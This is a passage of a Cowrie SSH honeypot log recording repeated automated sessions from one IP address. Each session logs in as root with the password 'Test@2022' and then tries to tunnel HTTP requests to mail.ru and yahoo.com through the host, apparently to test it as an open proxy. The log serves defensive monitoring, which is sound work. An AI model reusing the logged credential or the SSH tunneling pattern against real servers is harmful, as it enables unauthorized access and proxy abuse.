dsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:05.945512Z","src_ip":"77.83.207.83","session":"f587e40c04d3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:06.196100Z","src_ip":"77.83.207.83","session":"f587e40c04d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32041,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:32041","sensor":"my-vps","timestamp":"2025-08-31T03:46:06.247772Z","session":"f587e40c04d3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:06.298245Z","src_ip":"77.83.207.83","session":"f587e40c04d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20939,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:20939","sensor":"my-vps","timestamp":"2025-08-31T03:46:06.440567Z","session":"f587e40c04d3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:06.491340Z","src_ip":"77.83.207.83","session":"f587e40c04d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":23621,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23621","sensor":"my-vps","timestamp":"2025-08-31T03:46:06.632688Z","session":"f587e40c04d3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:06.683022Z","src_ip":"77.83.207.83","session":"f587e40c04d3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:06.734067Z","src_ip":"77.83.207.83","session":"f587e40c04d3"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":53328,"dst_ip":"1.2.3.4","dst_port":22,"session":"6634d16ea639","protocol":"ssh","message":"New connection: 77.83.207.83:53328 (1.2.3.4:22) [session: 6634d16ea639]","sensor":"my-vps","timestamp":"2025-08-31T03:46:06.783920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:06.784894Z","src_ip":"77.83.207.83","session":"6634d16ea639"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:06.836186Z","src_ip":"77.83.207.83","session":"6634d16ea639"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:07.090472Z","src_ip":"77.83.207.83","session":"6634d16ea639"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19932,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:19932","sensor":"my-vps","timestamp":"2025-08-31T03:46:07.142933Z","session":"6634d16ea639"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:07.194113Z","src_ip":"77.83.207.83","session":"6634d16ea639"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":23166,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:23166","sensor":"my-vps","timestamp":"2025-08-31T03:46:07.337318Z","session":"6634d16ea639"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:07.388155Z","src_ip":"77.83.207.83","session":"6634d16ea639"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":12698,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:12698","sensor":"my-vps","timestamp":"2025-08-31T03:46:07.533217Z","session":"6634d16ea639"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:07.583999Z","src_ip":"77.83.207.83","session":"6634d16ea639"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:07.635531Z","src_ip":"77.83.207.83","session":"6634d16ea639"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":53428,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc7929a8fed6","protocol":"ssh","message":"New connection: 77.83.207.83:53428 (1.2.3.4:22) [session: bc7929a8fed6]","sensor":"my-vps","timestamp":"2025-08-31T03:46:07.684976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:07.685899Z","src_ip":"77.83.207.83","session":"bc7929a8fed6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:07.736189Z","src_ip":"77.83.207.83","session":"bc7929a8fed6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:07.987447Z","src_ip":"77.83.207.83","session":"bc7929a8fed6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23244,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:23244","sensor":"my-vps","timestamp":"2025-08-31T03:46:08.039483Z","session":"bc7929a8fed6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:08.090206Z","src_ip":"77.83.207.83","session":"bc7929a8fed6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":31968,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:31968","sensor":"my-vps","timestamp":"2025-08-31T03:46:08.232910Z","session":"bc7929a8fed6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:08.283674Z","src_ip":"77.83.207.83","session":"bc7929a8fed6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":2552,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2552","sensor":"my-vps","timestamp":"2025-08-31T03:46:08.424988Z","session":"bc7929a8fed6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:08.475553Z","src_ip":"77.83.207.83","session":"bc7929a8fed6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:08.527010Z","src_ip":"77.83.207.83","session":"bc7929a8fed6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":53516,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf95daed10f6","protocol":"ssh","message":"New connection: 77.83.207.83:53516 (1.2.3.4:22) [session: bf95daed10f6]","sensor":"my-vps","timestamp":"2025-08-31T03:46:08.577041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:08.578097Z","src_ip":"77.83.207.83","session":"bf95daed10f6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:08.629522Z","src_ip":"77.83.207.83","session":"bf95daed10f6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:08.883481Z","src_ip":"77.83.207.83","session":"bf95daed10f6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25050,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:25050","sensor":"my-vps","timestamp":"2025-08-31T03:46:08.935387Z","session":"bf95daed10f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:08.986338Z","src_ip":"77.83.207.83","session":"bf95daed10f6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":17326,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:17326","sensor":"my-vps","timestamp":"2025-08-31T03:46:09.129265Z","session":"bf95daed10f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:09.180284Z","src_ip":"77.83.207.83","session":"bf95daed10f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36540,"dst_ip":"1.2.3.4","dst_port":22,"session":"21b474f45a05","protocol":"ssh","message":"New connection: 212.227.125.160:36540 (1.2.3.4:22) [session: 21b474f45a05]","sensor":"my-vps","timestamp":"2025-08-31T03:46:09.260112Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":29369,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:29369","sensor":"my-vps","timestamp":"2025-08-31T03:46:09.325190Z","session":"bf95daed10f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:09.376142Z","src_ip":"77.83.207.83","session":"bf95daed10f6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:09.427899Z","src_ip":"77.83.207.83","session":"bf95daed10f6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":53604,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3d1c4a811e4","protocol":"ssh","message":"New connection: 77.83.207.83:53604 (1.2.3.4:22) [session: e3d1c4a811e4]","sensor":"my-vps","timestamp":"2025-08-31T03:46:09.477083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:09.487329Z","src_ip":"77.83.207.83","session":"e3d1c4a811e4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:09.527940Z","src_ip":"77.83.207.83","session":"e3d1c4a811e4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:46:09.745090Z","src_ip":"212.227.125.160","session":"21b474f45a05"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:46:09.745774Z","src_ip":"212.227.125.160","session":"21b474f45a05"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:09.778440Z","src_ip":"77.83.207.83","session":"e3d1c4a811e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19923,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:19923","sensor":"my-vps","timestamp":"2025-08-31T03:46:09.829817Z","session":"e3d1c4a811e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:09.880439Z","src_ip":"77.83.207.83","session":"e3d1c4a811e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":22443,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:22443","sensor":"my-vps","timestamp":"2025-08-31T03:46:10.024714Z","session":"e3d1c4a811e4"}
